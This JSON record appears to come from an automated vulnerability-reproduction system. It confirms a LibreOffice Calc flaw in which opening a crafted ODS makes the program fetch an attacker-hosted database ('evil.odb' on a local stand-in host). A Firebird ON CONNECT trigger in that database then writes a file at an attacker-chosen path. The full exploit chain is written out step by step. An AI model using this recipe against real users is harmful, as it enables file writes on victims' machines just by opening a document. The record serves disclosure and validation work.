{
  "_pruva_terminal_reconciliation": {
    "authored_artifact_closure_sha256": "9844a4446fb90c3e1d8ff347118768cc81166464acb195a10b81fbb60b49c7d4",
    "authored_runtime_manifest_sha256": "fb59aa8c11685373beb280d70d917c1d18253600ef526683d7e649e6d013b3f7",
    "authored_verdict_sha256": "ace1df077b5454340af221a8b2b8b8bbcbe2b5a8a6dd7cb4a27977893ec77744",
    "claim_matching": "evaluated",
    "schema_version": 2,
    "status": "completed"
  },
  "attacker_controlled_input": "crafted ODS persisting a calcext:data-mapping (provider org.libreoffice.calc.sql, id T@http://127.0.0.1:8379/evil.odb) whose database part resolves to an attacker-hosted ODB containing an embedded Firebird database (ON CONNECT trigger: ALTER DATABASE ADD DIFFERENCE FILE $HOME/CVE-2026-63266_PWNED.marker + BEGIN BACKUP + attacker-chosen row insert)",
  "claim_outcome": "confirmed",
  "claimed_impact_class": "oob_write",
  "claimed_surface": "viewer_document",
  "crash_observed": true,
  "end_to_end_target_reached": true,
  "evidence_scope": "production_path",
  "exploit_chain_demonstrated": true,
  "exploitability_confidence": "high",
  "inferred": false,
  "observed_impact_class": "oob_write",
  "read_write_primitive_observed": true,
  "repro_result": "confirmed",
  "sanitizer_used": false,
  "trigger_path": "document open (soffice --headless --convert-to ods of crafted ODS) -> calcext:data-mappings restored during load (sc/source/filter/xml/xmlmappingi.cxx) -> org.libreoffice.calc.sql provider refresh -> sdb::DatabaseContext::getByName(name-as-URL) -> HTTP fetch of attacker ODB -> sdbc:embedded:firebird restore+attach without isc_dpb_no_db_triggers -> ON CONNECT database trigger -> Firebird nbackup difference file created at attacker-chosen absolute user-writable path",
  "validated_surface": "viewer_document"
}
